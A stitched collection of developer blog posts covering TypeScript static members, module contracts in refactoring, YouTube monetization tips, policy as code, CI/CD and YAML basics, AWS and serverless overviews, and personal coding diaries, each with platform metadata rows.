- Public Static Variables/Properties: to define the collection name and the connection.
- Public Static Methods: to define the collection query.
- Public Methods: to get the collection name, connection, database and collection query.
- Protected Methods: to get the static property of the child class.
The protected method is not intended to be used outside the model or one of its children, as it's an internal operation.
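To see the whole pattern end to end, here is a self-contained sketch (class names are illustrative, and the database parts are omitted): a child class only declares its static `collectionName`, and the parent resolves it at runtime through `this.constructor`.

```typescript
// Minimal sketch of the static-lookup pattern from this article
abstract class Model {
  /**
   * Collection Name
   */
  public static collectionName = "";
  /**
   * Get Collection Name via the child class constructor
   */
  public getCollectionName(): string {
    return (this.constructor as typeof Model).collectionName;
  }
}

class User extends Model {
  public static collectionName = "users";
}

class Post extends Model {
  public static collectionName = "posts";
}

console.log(new User().getCollectionName()); // "users"
console.log(new Post().getCollectionName()); // "posts"
```

Each instance resolves the static property of its own class, not the parent's, which is exactly why we look it up through `this.constructor` instead of `Model.collectionName`.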
## 🎨 Conclusion
We've learned a couple of good things here today: how and why to use static and non-static methods, how to access static properties of a child class from the parent class, and how to use the `this.constructor` feature.
Then we created a base model that allows us to get the collection query for the current model's collection name.
Finally, we added another feature to access the collection query, or any other static member, from a model instance.
## 🎨 Project Repository
You can find the latest updates of this project on [Github](https://github.com/hassanzohdy/nodejs-2023)
## 😍 Join our community
Join our community on [Discord](https://discord.gg/pb2vmdfhGf) to get help and support (Node Js 2023 Channel).
## 🎞️ Video Course (Arabic Voice)
If you want to learn this course in video format, you can find it on [Youtube](https://www.youtube.com/playlist?list=PLGO8ntvxgiZMJc7RN2lIq9WmMOlWZGzmz), the course is in Arabic language.
## 💰 Bonus Content 💰
You may have a look at these articles, it will definitely boost your knowledge and productivity.
General Topics
- [Event Driven Architecture: A Practical Guide in Javascript](https://dev.to/hassanzohdy/event-driven-architecture-the-best-paradigm-that-i-love-to-work-with-in-javascript-and-node-js-1gnk)
- [Best Practices For Case Styles: Camel, Pascal, Snake, and Kebab Case In Node And Javascript](https://dev.to/hassanzohdy/best-practices-for-case-styles-camel-pascal-snake-and-kebab-case-in-node-and-javascript-55oi)
- [After 6 years of practicing MongoDB, Here are my thoughts on MongoDB vs MySQL
](https://dev.to/hassanzohdy/after-6-years-of-practicing-mongodb-here-are-my-thoughts-on-mongodb-vs-mysql-574b)
Packages & Libraries
- [Collections: Your ultimate Javascript Arrays Manager](https://dev.to/hassanzohdy/collections-your-ultimate-javascript-array-handler-3o15)
- [Supportive Is: an elegant utility to check types of values in JavaScript](https://dev.to/hassanzohdy/supportive-is-an-elegant-utility-to-check-types-of-values-in-javascript-1b3e)
- [Localization: An agnostic i18n package to manage localization in your project](https://dev.to/hassanzohdy/mongez-localization-the-simplest-way-to-translate-your-website-regardless-your-favorite-framework-4gi3)
React Js Packages
- [useFetcher: easiest way to fetch data in React Js](https://dev.to/hassanzohdy/usefetcher-the-easiest-way-to-fetch-data-in-react-45o9)
Courses (Articles)
- [React Js: Let"s Create File Manager With React Js and Node Js](https://dev.to/hassanzohdy/lets-create-a-file-manager-from-scratch-with-react-and-typescript-chapter-i-a-good-way-to-expand-your-experience-5g4k)
| hassanzohdy |
1,241,566 | Refactoring Tools: Module Contracts for Lower Coupling | Let's continue our series of short posts about code refactoring! In it, we discuss technics and tools... | 20,198 | 2022-11-03T12:00:16 | https://dev.to/bespoyasov/refactoring-tools-module-contracts-for-lower-coupling-2153 | refactorit, typescript, architecture, javascript | Let's continue our series of short posts about code refactoring! In it, we discuss techniques and tools that can help you improve your code and projects.
Today we will talk about how to set clear boundaries between modules and limit the scope of changes when refactoring code.
## Ripple Effect Problem
One of the most annoying problems in refactoring is the ripple effect. It's a situation where changes in one module “leak” into other (sometimes far-distant) parts of the code base.
When the spread of changes isn't limited, we become “afraid” of modifying the code. It feels like “everything's gonna blow up” or “we're gonna need to update a lot of code”.
Most often the ripple effect problem arises when modules know too much about each other.
## High Coupling
The degree to which one module knows about the structure of other modules is called [coupling](<https://en.wikipedia.org/wiki/Coupling_(computer_programming)>).
When the coupling between modules is high, it means that they rely on the internal structure and implementation details of each other.
That is exactly what causes the ripple effect. The higher the coupling, the harder it is to make changes in isolation to a particular module.
Take a look at the example. Let's say we develop a blogging platform and there's a function that creates a new post for the current user:
```ts
import { api } from 'network'
async function createPost(content) {
// ...
const result = await api.post(
api.baseUrl + api.posts.create,
{ body: content });
// ...
}
```
The problem with this code lies in the `network` module:
- It exposes too many of its internal details to other modules to use.
- It doesn't provide the other modules with the clear public API that would guide them in how to use the `network` module.
We can fix that if we make the boundaries between the modules clearer and narrower.
## Unclear and Wide Boundaries
As we said earlier the root cause of the ripple effect is coupling. The higher the coupling, the wider the changes spread.
In the example above, we can count how tightly the `createPost` function is coupled with the `network` module:
```ts
import { api } from 'network' /* (1) */
async function createPost(content) {
// ...
const result = await api.post( /* (2) */
/* (3) */ api.baseUrl + api.posts.create, /* (4) */
/* (5) */ { body: content });
// ...
}
/**
* 1. The “entry point” to the `network` module.
* 2. Using the `post` method of the `api` object.
* 3. Using the `baseUrl` property...
* 4. ...And the `.posts.create` property to build a URL.
* 5. Passing the post content as the value for the `body` key.
*/
```
This number of points (5) is way too many. Any change in the `api` object details will immediately affect the `createPost` function.
If we assume that there are many other places where the `api` object is used, all those modules will be affected too.
The boundary between `createPost` and `network` is wide and unclear. The `network` module doesn't declare a clear set of functions for consumers (like `createPost`) to use.
We can fix this using contracts.
## API Contracts
A contract is a guarantee that one entity gives to others. It specifies how a module _can_ be used and how it _can't_.
Contracts allow other parts of the program to rely not on the module's implementation but only on _its “promises”_ and to base the work on those “promises.”
In TypeScript, we can declare contracts using types and interfaces. Let's use them to set a contract for the `network` module:
```ts
type ApiResponse = {
state: "OK" | "ERROR";
};
// A simplified post shape for the example:
type Post = { body: string };
interface ApiClient {
createPost(post: Post): Promise<ApiResponse>;
}
```
Then, let's implement this contract inside the `network` module, only exposing the public API (the contract promises) and not revealing any extra details:
```ts
const client: ApiClient = {
createPost: async (post) => {
const result = await api.post(
api.baseUrl + api.posts.create,
{ body: post })
return result
}
};
```
We concealed all the implementation details behind the `ApiClient` interface and exposed _only_ the methods that are really needed for the consumers.
> By the way, this may remind you of the [“Facade” pattern](https://refactoring.guru/design-patterns/facade) or the [“Anti-Corruption Layer” technique](https://learn.microsoft.com/en-us/azure/architecture/patterns/anti-corruption-layer).
After this change, we'd use the `network` module in the `createPost` function like this:
```ts
import { client } from 'network'
async function createPost(post) {
// ...
const result = await client.createPost(post);
// ...
}
```
The number of coupling points decreased now to only 2:
```ts
import { client } from 'network' /* (1) */
async function createPost(post) {
// ...
const result = await client.createPost(post); /* (2) */
// ...
}
```
We don't rely on how the `client` _works under the hood_, only on how it _promises us to work_.
It allows us to change the internal structure of the `network` module how we want. Because while the contract (the `ApiClient` interface) stays the same the consumers don't need to update their code.
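To make that concrete, here is a small self-contained sketch (the names are illustrative, not the article's real modules): two implementations satisfy the same `ApiClient` contract, so the consumer code doesn't change when we swap them.

```typescript
// Two interchangeable implementations of one contract.
type ApiResponse = { state: "OK" | "ERROR" };
type Post = { body: string };

interface ApiClient {
  createPost(post: Post): Promise<ApiResponse>;
}

// Implementation A: an in-memory stub (handy for tests)
const stubClient: ApiClient = {
  createPost: async () => ({ state: "OK" }),
};

// Implementation B: same contract, different internals
const loggingClient: ApiClient = {
  createPost: async (post) => {
    console.log(`creating post: ${post.body}`);
    return { state: "OK" };
  },
};

// The consumer is written once, against the contract only:
async function createPost(client: ApiClient, post: Post): Promise<ApiResponse> {
  return client.createPost(post);
}
```

Because `createPost` depends only on the `ApiClient` “promise,” replacing one client with the other causes zero ripple in the consumer.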
> By the way, a contract isn't necessarily a type signature or an interface. Contracts can be verbal or written agreements, DTOs, message formats, etc. The important thing is that these agreements declare and fix the behavior of the parts of the system toward each other.
It also allows us to split the code base into distinct cohesive parts that are connected with narrow and clearly specified contracts:

This, in turn, lets us limit the spread of changes when refactoring the code because they will be scoped inside the module:

## More About Refactoring in My Book
In this post, we only discussed the coupling and module boundaries.
We haven't mentioned the other significant part of this topic, cohesion. We also skipped the formal definition of a contract and the Separation of Concerns principle, which can help us see where to draw these boundaries.
If you want to know more about these aspects and refactoring in general, I encourage you to check out my online book:
> **[“Refactor Like a Superhero”](https://github.com/bespoyasov/refactor-like-a-superhero)**
The book is free and available on GitHub. In it, I explain the topic in more detail and with more examples.
Hope you find it helpful! Enjoy the book 🙌 | bespoyasov |
1,241,951 | Simple steps to start a $5,000/month YouTube channel - Adam_DelDuca | Original Tweet From @Adam_DelDuca Adam | YouTube ... | 0 | 2022-11-08T10:55:28 | https://infotweets.com/blog/simple-steps-to-start-a-5000month-youtube-channel-adamdelduca-fa1 | productivity, youtube, career | #### Original Tweet From [@Adam_DelDuca](https://twitter.com/Adam_DelDuca)
{% embed https://twitter.com/Adam_DelDuca/status/1585962781945495552 %}
### 1. Pick the right niche
The right niche on YouTube leads to:
- Fast growth
- High income
The wrong niche on YouTube leads to:
- Frustration
- Financial struggles
How do you pick the right niche?
Let me explain…
Your niche requires two elements:
1. Your interest
2. Viewer interest
When both parties are engaged, views and growth will be inevitable
Here are some in-demand niches for 2023: 
### 2. Emulate success
There are two ways to generate video ideas on YouTube:
1. Make content you think will work
2. Make content you know will work
Choosing the second option is the faster path to success
Let’s get into two ways to use this approach…
1. Sort creators' videos by most popular and re-create them
Add in your own personal takes
2. Find “crack” videos where views > subscribers
Cracks are videos that outperformed the creators subscriber base
They make for great videos to emulate and here’s an example: 
### 3. Structure your videos
Your videos should have the following structure:
1. Hook
2. Intro
3. Body
4. Conclusion
Pro Tip: Transition viewers from one videos to another in the end screens to drive up session and watch time
###4|. Maximize clicks
The only way your channel will grow is by getting views
To get views, you need to maximize your clickthrough rate (CTR)
This comes from mastering titling and thumbnails
Next are a few tips that can get you more views right away…
Titles:
- Keep them short (<50 characters)
- Prompt intrigue
- Sell an outcome
Thumbnails:
- Use contrasting colors
- Complement title
Pro tip: use colors in thumbnails different than those you see on the side bar to stand out
### 5. Monetize efficiently
Most YouTube channels make next to no money
Why?
Because they solely rely on ad revenue
This is a mistake…
Let me share the stark difference between poor and strong monetization…
Ad revenue:
10,000 monthly views x $10 RPM = $100
Affiliate offer:
10,000 monthly views x 2% conversion x $10 commission = $2,000
Same traffic but 20x the income
Do not make this mistake on your channel…
Start building your own $5,000/mo YouTube channel
Get my guide Tube Ignite (25% off next 5 copies ONLY): [https://adamdelduca.gumroad.com/l/tubeignite/25off](https://adamdelduca.gumroad.com/l/tubeignite/25off)
If you enjoyed this thread, please RT the first tweet
Follow me for more YouTube wisdom:
[@Adam_DelDuca](https://twitter.com/Adam_DelDuca)
Click [Here](https://www.knowledge-twitter.com/?utm_source=dev.to) For More Posts Like This [https://www.knowledge-twitter.com](https://www.knowledge-twitter.com/?utm_source=dev.to) | knowledgefromtwitter |
1,242,219 | Cloud security fundamentals part 4: Align and automate with policy as code | Security policies are still awaiting digital transformation. A key phrase in today’s cloud-driven... | 0 | 2022-11-14T15:19:13 | https://snyk.io/blog/cloud-security-fundamentals-part-4/ | cloudnativesecurity, cloud, cloudsecurity, policyascode | ---
title: Cloud security fundamentals part 4: Align and automate with policy as code
published: true
date: 2022-11-03 16:25:26 UTC
tags: CloudNativeSecurity,cloud,cloudsecurity,policyascode
canonical_url: https://snyk.io/blog/cloud-security-fundamentals-part-4/
---
Security policies are still awaiting digital transformation.
A key phrase in today’s cloud-driven world, “digital transformation” generally refers to the ongoing work of digitizing formerly paper-based processes. “Paper,” however, is not literal — many processes don’t use paper, but still flow as if they were. Uploading a document to Google Drive, in other words, doesn’t amount to digital transformation.
In this sense, IT security policies still have a long way to go. In many companies, security teams codify security policies into handbooks, PDFs, and checklists, and enforce written policies manually. But manual work, reliant on human reinforcement and human follow-through, is vulnerable to mistakes.
A security policy can be strict and comprehensive on paper, but lenient and limited in practice. When error-prone processes such as these are scaled to the cloud, the risks can be immense.
It doesn’t have to be this way. By using [policy as code (PaC)](https://snyk.io/learn/policy-as-code/), companies can create and reinforce security policies that scale.
## User education is stressful and difficult to scale
A common mantra in the security industry is that “the human is always the weakest link.” With humans as a common point of vulnerability, security teams have had to work on educating end users about behaviors that will keep them and the company more secure. This education can range from simple (use strong passwords instead of weak ones) to more complex (design cloud environments without misconfigurations that open the company to attack).
Educating users, however — even technical ones — is not easy. According to [ESG research](https://www.esg-global.com/esg-issa-research-report-2018?utm_campaign=Cybersecurity%202019&utm_source=slider), 38% of cybersecurity professionals report that the most stressful part of their jobs is getting users to understand cybersecurity risks and change their behavior as a result.
This isn’t to say that users don’t care about security. Rather, it suggests that the demands of any user’s job might tempt them to take easier paths, such as writing a password on a sticky note or skimming security policy documents while building an environment. It’s less about not caring and more about bandwidth.
The gap between a priority and a preference is wide, and it reveals that manual reinforcement of security policies is neither a scalable nor sustainable strategy.
## Policy as code is objective and automatic
PaC is a scalable solution to a problem that’s already reached a massive size.
Cloud environments can often contain hundreds of thousands of resources and even vaster amounts of configurations. No one human can memorize or reinforce all of the associated security rules — especially when the environment is constantly changing. And even when a given policy is captured and recorded, the user on the other end might still ignore or misinterpret it. In addition, written policies often contain some amount of ambiguity, and cloud use cases vary considerably. So it’s often left up to engineers to figure out how policies should apply to what they’re building.
PaC leverages the programmability of the cloud by making cloud security programmable too. With PaC, security teams can express security and compliance rules in languages that applications can read and automatically validate. In cloud environments, PaC can check other code, both at the application and infrastructure levels, for non-compliant conditions.
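As a toy illustration only (real policy-as-code work uses engines such as Open Policy Agent, and the resource shapes here are invented for the example), the core idea is that a rule becomes an executable predicate over configuration data:

```typescript
// Toy policy-as-code check: rules are code, so they run automatically and objectively.
type BucketConfig = { name: string; publicAccess: boolean; encrypted: boolean };
type Violation = { resource: string; rule: string };

// Each rule is a named predicate that must hold for a compliant resource.
const rules: Array<[string, (b: BucketConfig) => boolean]> = [
  ["no-public-access", (b) => !b.publicAccess],
  ["encryption-required", (b) => b.encrypted],
];

function checkPolicies(buckets: BucketConfig[]): Violation[] {
  const violations: Violation[] = [];
  for (const bucket of buckets) {
    for (const [rule, holds] of rules) {
      if (!holds(bucket)) violations.push({ resource: bucket.name, rule });
    }
  }
  return violations;
}

console.log(checkPolicies([{ name: "logs", publicAccess: true, encrypted: false }]));
// → two violations for the "logs" bucket
```

Because the policy is code, the same check runs identically in CI, at deploy time, and against the live environment; no human has to remember or reinterpret the rule.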
With PaC, security teams can create a single source of truth that is clear, objective, and easy to interpret. This truth creates alignment across teams, and with that alignment comes speed (due to both automation and mutual understanding). This ensures that development teams don’t need to sacrifice speed for the sake of security or vice versa.
## Security teams as policy vendors
Security teams using PaC to create and reinforce security policies can shift their roles from enforcers to maintainers. Instead of manually writing policies and educating users on how and why to follow them, security teams can become domain experts who maintain PaC libraries, transmit best practices, and ensure follow-through.
PaC, however, is not a panacea, and security teams will benefit from keeping three things in mind as they implement it:
1. Use a PaC framework that works across the software development lifecycle (SDLC). Using different frameworks at different stages leads to disagreement and security gaps.
2. Don’t use proprietary PaC products. PaC offerings from vendors often lack the flexibility enterprises need for their specific use cases. Open source is usually the best option when implementing PaC.
3. If you don’t have access to cloud compliance experts, use pre-built libraries that compliance experts have already developed and distributed. This way, you can interpret sometimes ambiguous controls, apply the controls to your specific use case, and express them in PaC.
With these three factors in mind, PaC becomes a tool security teams can implement well.
## Only code can scale to the cloud
Scalability is the key to cloud security. The cloud is simply too complex — too large and too disparate — for manual, human effort to be effective. Only code can scale up to meet the demands of the cloud while also providing the granularity security policies need.
## Get more guidance on using policy as code
Read the full paper on the 5 Fundamentals of Cloud Security.
[Download now](https://go.snyk.io/five-fundamentals-of-cloud-security.html)
<!-- /.block --> | snyk_sec |
1,242,591 | CICD Requirements , YAML intro, Objects In YAML | Intro Hello, everyone. Welcome back in this brand-new POST will be talking a bit about... | 20,400 | 2022-11-04T03:49:37 | https://dev.to/nothanii/cicd-requirements-yaml-intro-objects-in-yaml-2j6a |
## Intro
**Hello**, everyone.
Welcome back! In this brand-new post we will be talking a bit about GitHub Actions, continuous integration, and continuous deployment.
> Why is that important?
And
> How can you set up basic pipelines for your project on *GitHub Actions*?
By the end of this course, you will not just understand what **GitHub Actions** is and what *CICD* means.
You will also have built a few small build **pipelines** where your project is built, tested, and then deployed automatically wherever you want.
## Why is CICD required?

All right,
in this course, I'll be following along with a simple React playground.

I'm just going to use "CICD with GitHub" as the name, and you can pretty much follow along on your local system.
Once you get started with the project, we won't focus on the project itself that much; instead, in this little series, we'll focus on something known as YAML files, and on GitHub Actions. So: GitHub Actions is basically a service which allows you to do
> continuous integration, and continuous deployment.
Now, let's actually understand:
- What exactly is this, and why do we need it?
When you're building a project on your local system, you are essentially working in the most comfortable way you can as a developer, right?
You organize the code and folders to make the experience nice for yourself. But a lot of the time your project needs a build step, and sometimes even a compilation step, to become production-ready. That means trimming dead code, compressing the code, making it more performant, and so on, and all of these build and compilation steps take time to run. So, in a nutshell, what these *CICD* services do is allow
> whatever you or any member of your team has coded to be built and deployed to a staging, production, or preview environment (whatever environments you have) automatically, once you push to a repository like GitHub.
Now, this is important because, as a developer, you don't want to spend a lot of time just building and testing everything yourself on your local system.
> Why?
Because it wastes your time and the computing capacity you have on your system.
You want to make sure that your deployment and testing are as automated as possible, so that you, as a developer, spend most of your time working on logic and building new features instead of building and testing the project yourself. GitHub provides this as one of its services. GitHub is not the only place where you can run CICD; there are countless tools out there that can do it, but I prefer GitHub here because
> GitHub Actions sits right next to your source code. When we take a look at how we push this project, I'll show you that GitHub is just a very convenient place to push your source code to.
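To give a taste of where we're heading, here is a minimal GitHub Actions workflow for a Node/React project (a sketch only; the npm scripts are assumptions, and we'll build real workflows up properly later in this series):

```yaml
# .github/workflows/ci.yml
name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: npm ci         # install dependencies
      - run: npm test       # run the test suite
      - run: npm run build  # produce the production build
```

Every push then triggers this pipeline automatically, which is exactly the CICD idea described above.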
## YAML Introduction

I want to talk a bit about YAML.
> What exactly is it?
YAML stands for *YAML Ain't Markup Language* (some people also say *Yet Another Markup Language*). But the point you have to remember is:
> YAML is pretty much what JSON is, right?
So you have seen stuff like package.json right? When you take a look inside package.json, you see there are these objects which can contain keys and values keys and values, right? Yeah, YAML is pretty much the same thing. The only difference is how YAML has written Json is used as a thing to communicate between different kind of languages and build systems and, you know, environments, right? So package.json can be read by JavaScript as well. Package.json this file, technically could also be read by a Java program or a python. Program, right? So let's say, if your Nodejs script wanted to spit out some data, which your python Market would read then. One way to do that, is to spit out that data into a Json format. Similarly, YAML is also a similar format for which you would have, you know, you would require a few libraries. For example, there is no native support for able in node.js, but it's more like a data exchange format among different you know, different languages. Different systems. Now, what YAML does better over Json is readability? Right, so we're gonna see eventually like this is, this is also quite readable, but YAML is even more cleaner. Why? Because it uses very less special characters. Like usually, there is no need of these codes. These brackets, these commas. Nothing is required by. There is very very minimal language syntax, which you need are a lot of information which needs to be go, you know, needs. To go in the file is just basically what your logic is for the data. So this little section or in this collection we're going to learn about YAML a bit, because it is really important to understand. YAML first, before you actually start writing work profiles because this is almost like a new kind of data format, which you are seeing right. Let me go ahead and get on with you who the YAML syntax a bit from the next one.

## Objects In YAML
Let's start with YAML basics.
We're going to cover a few important things in YAML. The first thing is:
> how you create keys and value pairs
In YAML, you write the key name, then a colon, and then the value. That alone is a completely valid YAML file. Similarly, if my project had tests, I could have `test` as `script1`, then `test2` as `script2`, and so on. If you compare it with an equivalent rendering in JavaScript/JSON, YAML holds the same information in a much more condensed form.
It gets even more condensed as we nest objects. So far we have only created some top-level key/value pairs, but it is also possible in YAML to create nested objects, and the way you do that is with indentation: you can see `my app` as the key of a parent object.
The three keys under it are all indented. One very important thing in YAML:
> Just like in Python, the indentation has to be consistent all across your file. (Note: unlike Python, YAML indentation must use spaces; tabs are not allowed.)
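For example, the key/value pairs and the nested object described above might look like this (the key names are illustrative):

```yaml
# top-level key/value pairs
name: cicd-with-github
test: script1
test2: script2
# a nested object, created with consistent indentation
my_app:
  build: script1
  test: script2
  deploy: script3
```

The equivalent JSON would wrap `my_app` in braces, with quotes and commas everywhere; the YAML version carries the same data with almost no special characters.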

The same structure in JSON would be `my app` mapped to an object. These two files are technically equivalent in terms of the data they contain. This is important, because now you can see that the YAML version is much cleaner and much more human-readable compared to JSON.
### ***TO BE CONTINUED *** | nothanii | |
1,242,822 | why AWS is best in 2022 ? | AWS is the leading provider for cloud computing. It provides a set of services that allow users to... | 0 | 2022-11-04T07:56:05 | https://dev.to/akshat2203/why-aws-is-best-in-2022--m9 | aws, cloud, beginners, devops | AWS is the leading provider for cloud computing. It provides a set of services that allow users to store, manage, and analyze data in several geographically distributed locations.
AWS was first launched in 2006, several years before Microsoft Azure. It has grown rapidly since then, and now serves as an important part of many businesses' IT architecture.
The main benefits of using AWS are:
* Scalability: AWS offers a large number of servers that are ready to be used by customers. This allows you to scale up or down according to your needs without having to worry about how many servers you will need at any given time.
* Flexibility: You can choose from different types of software like Linux and Windows so that you can run whatever application you want on your infrastructure without worrying about compatibility issues between different platforms.
* Cost-effectiveness: The cost per hour is often lower than comparable options on the market today, such as Microsoft Azure, Google Cloud Platform (GCP), and IBM Bluemix, which offer similar features at a higher hourly price than AWS's pricing scheme. This makes AWS an attractive choice for businesses that want lower costs while still retaining some flexibility. | akshat2203 |
1,243,043 | Explain SQL Like I'm Five | Now, I'm curious about what exactly SQL is. I've seen it used for websites, but I never understood... | 0 | 2022-11-04T09:27:36 | https://dev.to/calum_medlock/explain-sql-like-im-five-3j86 | explainlikeimfive, sql | Now, I'm curious about what exactly SQL is. I've seen it used for websites, but I never understood its sole purpose, so… anyone happy to explain? | calum_medlock |
1,243,411 | New era: The Official Site | Finally, the fabled day has come. The genesis of a new world order. One were platforms are linked,... | 0 | 2022-11-04T14:30:44 | https://dev.to/lit_mgwebi/new-era-the-official-site-2n2d | showdev, webdev, web3, career | Finally, the fabled day has come. The genesis of a new world order. One where platforms are linked, communication is efficient, and everything is connected.
I have finally completed my portfolio site. Follow the link to check it out. Please and Thank you
https://lithimgwebi.vercel.app/ | lit_mgwebi |
1,243,416 | Find out how Rapid Development with Serverless is like Lego! | Many don't understand how to use a Rapid Development approach in Serverless. Even in the broader... | 0 | 2022-11-04T14:31:56 | https://theserverlessedge.com/find-out-how-rapid-development-with-serverless-is-like-lego/ | serverless, cloud, aws, architecture | Many don't understand how to use a Rapid Development approach in Serverless, even in the broader architecture community. Adrian Cockcroft has produced excellent talks on the subject. This short six-minute video is a great example of one:
{% embed https://www.youtube.com/watch?v=5siD210Grr4 %}
What is Rapid Development with Serverless? And why, as an architect, is it important to understand it compared to traditional methods?
## Serverless is like building with interoperable Lego Blocks
Adrian talks about Cloud Providers taking common industry patterns and needs, like ‘gateways’, compute, storage. And creating Managed Services that cater for the needs of teams. In AWS, your serverless gateway option would be an API Gateway. For Serverless Compute you might have Lambda. And for persistence you could have DynamoDB or Aurora.
These Managed Services are the ‘lego blocks’. Within the Cloud Provider these blocks are highly interoperable, abstract in nature (you won’t know the inner workings), and usually highly configurable to your needs. You are able to put these building blocks together for higher-order functions, e.g. a business application. You could use an API Gateway block integrated with a Lambda function to run logic. And you could integrate with DynamoDB for persistence.

## Get feedback quickly
Adrian is correct. A team can produce a working system within hours. Let’s examine this more deeply. The idea is that Serverless teams have a bias for action. They put lego blocks together. And put solutions in place, through rapid development.
You need to understand that a serverless ecosystem is geared towards rapid experimentation and feedback. Test and Release cycles can be short, as in literally minutes. And as there is no provisioned physical infrastructure (that the team owns), costs are accommodating and low.
Serverless teams will favour a product mindset and be much more able to react and pivot to directional shifts from the business. Traditional cycles are not as accommodating to experimentation and rapid feedback driven approaches.
## Embracing the Enabling Constraints
Serverless provides teams with constraints that guide their designs and how they assemble their architectures. In traditional architecture approaches there may be investment in working out interoperability and compatibility with Open Source and COTS solutions. Serverless-First and enabling constraints simply speed up the decision making process and allow for rapid development. These constraints guide the serverless architecture patterns, of which there are many, that teams can adopt.
The Rapid Development Approach using Serverless provides teams with access to usable building blocks. Teams can benefit from the principles of interoperability, abstraction, optimised ops and costs.
And they can leverage it in a continuous development style workflow. This workflow will change how the industry thinks about software. And will ultimately help evolve it towards a Serverless-First industry.
## Traditional v Rapid Development

| serverlessedge |
1,243,501 | What was your win this week? | Hey folks! 👋 Hope everybody is having a fantastic Friday and that you all have wonderful... | 0 | 2022-11-04T16:16:05 | https://dev.to/devteam/what-was-your-win-this-week-5fbc | discuss, weeklyretro | Hey folks! 👋
Hope everybody is having a fantastic Friday and that you all have wonderful weekends!
Looking back on this past week, what was something you were proud of accomplishing?
All wins count — big or small 🎉
Examples of 'wins' include:
- Starting a new project
- Fixing a tricky bug
- Raking the lawn 🍂
---
Time to dive into the weekend!
 | michaeltharrington |
1,243,509 | Day 01 - 100DayOfCode Challenge | Shit!!! 👻 I recently started the #100DaysofCode challenge. Every few days I take a piece of code and... | 20,608 | 2022-11-04T16:25:00 | https://dev.to/highnitin/day01-100dayofcode-challenge | 100daysofcode, highnitin, webdev, javascript | Shit!!! 👻
I recently started the #100DaysofCode challenge. Every few days I take a piece of code and write about it to improve my programming skills and to assess my knowledge. 😀
And Jayesh, thanks for sharing your story and preaching about learning on a daily basis, and that's why I commit to #100DaysofArticleReading + #100DaysofNewsletterReading. 📑
I just read two amazing articles that I can't help but share with my connections right away. In this post I will briefly explain what these two articles are about. 📑
Article 1 is about - 11 Amazing New JavaScript Features in ES13, which includes:
1. Class Field Declarations,
2. Private Methods and Fields
3. await Operator at the Top Level
4. Static Class Fields and Static Private Methods
5. Class Static Block
6. Ergonomic Brand Checks for Private Fields
7. at() Method for Indexing
8. RegExp Match Indices
9. Object.hasOwn() Method
10. Error Cause
11. Array Find from Last
Article 2 is about - How to design good APIs? which includes:
1. What is API?
2. API Design Goals
3. API Design in Practice
4. Side Effects
5. Handling Large Response
6. Consistency v/s Availability
So we have looked at the latest features that ECMAScript 2022 i.e. ES13 brings to JavaScript. Please use them to increase your productivity as a developer and write cleaner code with more brevity and clarity.
I want to learn and share with you folks ;) I want to get updates from you and also support your challenges daily. Any feedback is always appreciated.
Buckle up! We have a full year of coding ahead of us. See you on the next post :)
For Video explanation - https://www.youtube.com/watch?v=ri-OtBDcq44
------------------------------------------------------------------
Article Link:
1. https://medium.com/@interviewready/how-to-design-good-apis-ccd875590599
2. https://javascript.plainenglish.io/es13-javascript-features-eed7ed2f1497
------------------------------------------------------------------
Cheers,
HighNitin | highnitin |
1,243,527 | Alternative Data | Hey, Recently I visited Proxycurl and got some information about Alternative Data. There's a lot of... | 0 | 2022-11-04T17:11:46 | https://dev.to/happyhearthacker/alternative-data-14eg | data, nubela | Hey,
Recently I visited [Proxycurl](https://nubela.co/blog/the-ultimate-guide-to-alternative-data-what-is-it-really/) and got some information about Alternative Data.
There's a lot of talk these days about "big data" and the insights that can be gleaned from large data sets. But what about "alternative data"?
I blogged about that here [https://hulkhack.blogspot.com/2022/11/alternative-data.html](https://hulkhack.blogspot.com/2022/11/alternative-data.html)
Found that [ProxyCurl](https://nubela.co/proxycurl/solutions/alternative-data-for-investment-firms) is the best place for alternative data.

| happyhearthacker |
1,243,834 | Weekly 0035 | Monday Some difficult to have a good sleep, I woke very very early in the night. I tried... | 17,109 | 2022-11-06T20:00:02 | https://dev.to/kasuken/weekly-0035-5h33 | ### Monday
I had some difficulty getting a good sleep; I woke very early in the night.
I tried to arrange my daily activities and my week activities.
I also created a lot of todo entries for the new course about Visual Studio Code for [Improove Academy.](https://www.improove.tech/)
Then I debugged Red Origin for the entire morning and the beginning of the afternoon, stopping a little before the meeting about the future of Red Origin.
We are deciding if we want to proceed with the project or not.
We will take the decision tomorrow.
By the way I have learned another new thing today: how to retrieve all the information about the scopes with the Graph API in C#.
I will write an article about, for sure.
{% embed https://twitter.com/kasuken/status/1585915393398689792?s=20&t=QdgDJnrSzranN8vnlZhUTA %}
At the end of working hours I did the Hacktoberfest!!!
{% embed https://twitter.com/kasuken/status/1587137570378579969?s=20&t=5vJxPssSxKdA-yaQoVVUGw %}
**Mood:** 🤓
### Tuesday
I spent the whole day writing tests in Microsoft Excel. Yes… not Azure DevOps but Microsoft Excel… please don’t ask.
I wrote down more than 100 tests.
In the late afternoon I also wrote down the strategies to give a good support level to the product.
**Mood**: 🙁
### Wednesday
The first task of the day was: add Auth0 to the new Brandplane Project. Done and dusted in 1 hour.
I will create a new template for dotnet with Auth0 just implemented. I use this logic a lot of time… and every time I spend 1-2 hours to configure everything.
Then, I started to test Red Origin with different accounts permission, just for testing buttons and permissions.
**Mood:** 😒
### Thursday
A very long day. In the morning I asked a friend of mine to help with some architecture notes for Red Origin.
I implemented Refit ([https://www.nuget.org/packages/Refit](https://www.nuget.org/packages/Refit)) and a better way to use Entity Framework.
I have a lot of technical debt around Entity Framework. I don’t use it very often and I know that it’s one of my big flaws.
I will study it much better in the next weeks.
By the way, at the end of the day I rewrote a lot of my code from the UI to the service layers.

This is the result of the refactoring at the end of the day.
I also created a timelapse during this working activity.
{% embed https://twitter.com/kasuken/status/1588156033746223105?s=20&t=QdgDJnrSzranN8vnlZhUTA %}
**Mood: 🤪**
### Friday
A lazy and not really productive day, but in the end I implemented two features on Red Origin. I just moved the favorites list of the Azure AD apps to a dedicated page, plus some minor improvements in the application.
In the late afternoon I posted an article on the blog about the Logging Level in .NET 6 projects.

[https://dev.to/kasuken/enabling-and-disabling-logs-in-aspnet-core-6-4076](https://dev.to/kasuken/enabling-and-disabling-logs-in-aspnet-core-6-4076)
**Mood: 😒**
---
Thanks for reading this post, I hope you found it interesting!
Feel free to follow me to get notified when new articles are out 🙂
{% embed https://dev.to/kasuken %}
| kasuken | |
